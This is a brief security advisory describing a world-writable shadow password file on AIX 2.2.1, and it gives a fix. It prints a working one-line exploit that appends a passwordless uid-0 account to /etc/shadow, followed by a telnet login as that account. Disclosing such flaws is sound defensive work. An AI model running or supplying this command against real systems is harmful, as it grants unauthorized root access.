- shadow COMMAND shadow SYSTEMS AFFECTED AIX 2.2.1 PROBLEM The Shadow password file is installed writeable by default. Any user can add or modify entries giving them access to root. echo "rewt::0:0:blahness:/:/bin/sh" >> /etc/shadow telnet localhost Login:rewt # SOLUTION Remove the write attribute from the shadow password file